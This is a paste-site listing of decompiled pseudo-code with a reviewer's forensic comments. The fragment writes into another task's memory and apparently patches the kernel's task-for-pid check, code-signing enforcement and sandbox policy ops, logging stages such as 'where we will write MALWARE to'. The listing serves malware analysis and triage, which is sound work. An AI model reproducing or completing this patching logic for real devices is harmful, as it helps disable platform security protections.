From Gruff Crocodile, 3 Years ago, written in Plain Text.
  // Decompiler pseudo-code (register and stack-slot level) from the middle of a
  // routine; the function's start and end are not part of this listing.
  // The visible part writes into another task's memory with the Mach calls
  // vm_write / vm_read_overwrite and logs each stage through _logToFile.
  // NOTE(review): the helper names (_find_tfp_off, _find_cs_enforcement_disable_amfi,
  // _find_sbops) and the "patched pid_check" string suggest the targets are the
  // kernel's task-for-pid check, code-signing enforcement and sandbox policy ops.
  // That is inferred from names only; confirm against the disassembly.
  // Triage: the log strings below appear as literals in the decompilation, so they
  // are usable string-match pivots when hunting for this sample or its log file.

  // Logs r10, the destination address used by the 0x10-byte write below. The format
  // has a single %08x; the trailing arguments are presumably decompiler register noise.
  1.  _logToFile("where we will write MALWARE to: 0x%08x\n", r10, 0x8, sp + 0x34);
  // Two 4-byte writes of the same local word (sp + 0x94) to stack[2019] and
  // stack[2019] + 4, in the task whose port is read from *r8. Return values ignored.
  2.     vm_write(*r8, stack[2019], sp + 0x94, 0x4);
  3.     vm_write(*r8, stack[2019] + 0x4, sp + 0x94, 0x4);
  // Copies 0x10 bytes from the fixed address 0x4fe83 (presumably static data in this
  // image, TODO confirm) to r10 in task r11. This is the only write in the listing
  // whose kern_return_t is checked, and a failure is only logged: execution continues.
  4.     r1 = r10;
  5.     if (vm_write(r11, r1, 0x4fe83, 0x10) != 0x0) {
  6.             _logToFile("Hacked FAILED\n", r1, 0x4fe83, 0x10);
  7.     }
  // r8 is repointed to 0x55dd0; every later call passes *r8 as the target task.
  // NOTE(review): presumably the address of a global holding a task port; confirm.
  8.     r8 = 0x55dd0;
  // Writes 8 bytes from the local buffer at sp + 0x34 directly after the 0x10-byte
  // blob (r10 + 0x10), still using r11 as the target task.
  9.     vm_write(r11, r10 + 0x10, sp + 0x34, 0x8);
  // Messages the default NSNotificationCenter with an NSDictionary built by a class
  // method call. The selectors were lost in decompilation (they show as stack[2008]
  // and stack[2006]); presumably a notification post with a userInfo dictionary,
  // confirm in the disassembly. r11 is cleared to 0 in between.
  10.     r5 = [[NSNotificationCenter defaultCenter] retain];
  11.     asm { strd       r1, r0, [sp, #0xb0 + var_88] };
  12.     r4 = [objc_msgSend(@class(NSDictionary), stack[2008]) retain];
  13.     r11 = 0x0;
  14.     objc_msgSend(r5, stack[2006]);
  15.     [r4 release];
  16.     [r5 release];
  // Reloads three values from stack slots and passes them to _find_tfp_off together
  // with a pointer to a local (sp + 0x24). What the three values hold is not visible.
  17.     r10 = stack[2010];
  18.     r6 = stack[2009];
  19.     r5 = stack[2005];
  20.     _find_tfp_off(r10, r6, r5, sp + 0x24);
  // Reads 4 bytes at stack[2011] from task *r8 into sp + 0x90 (r2 = sp + 0x94 is the
  // outsize pointer), then writes 4 bytes from sp + 0x94 to the same address. The
  // value written cannot be recovered from this listing.
  21.     r1 = stack[2011];
  22.     r2 = sp + 0x94;
  23.     asm { strd       fp, fp, [sp, #0xb0 + var_20] };
  24.     vm_read_overwrite(*r8, r1, 0x4, sp + 0x90, r2);
  25.     r4 = sp + 0x94;
  26.     vm_write(*r8, stack[2011], r4, 0x4);
  // Forensic caveat: this log call is unconditional. The vm_write result above is not
  // checked, so "patched pid_check" in a log file does not prove the write succeeded.
  27.     _logToFile("patched pid_check\n", stack[2011], r4, 0x4);
  // Same read-then-write pattern at r0 + r10, where r0 is the helper's return value.
  // NOTE(review): looks like offset + base; confirm. No return value is checked and
  // nothing is logged for this step.
  28.     r0 = _find_cs_enforcement_disable_amfi();
  29.     asm { strd       fp, fp, [sp, #0xb0 + var_20] };
  30.     vm_read_overwrite(*r8, r0 + r10, 0x4, sp + 0x90, r4);
  31.     vm_write(*r8, r0 + r10, sp + 0x94, 0x4);
  // Calls _find_sbops with the same three values and a pointer to sp + 0x90, then
  // logs stack[2038] as the located address. The listing ends here.
  32.     _find_sbops(r10, r6, r5, sp + 0x90);
  33.     _logToFile("Found sbops 0x%08x\n", stack[2038], r5, sp + 0x90);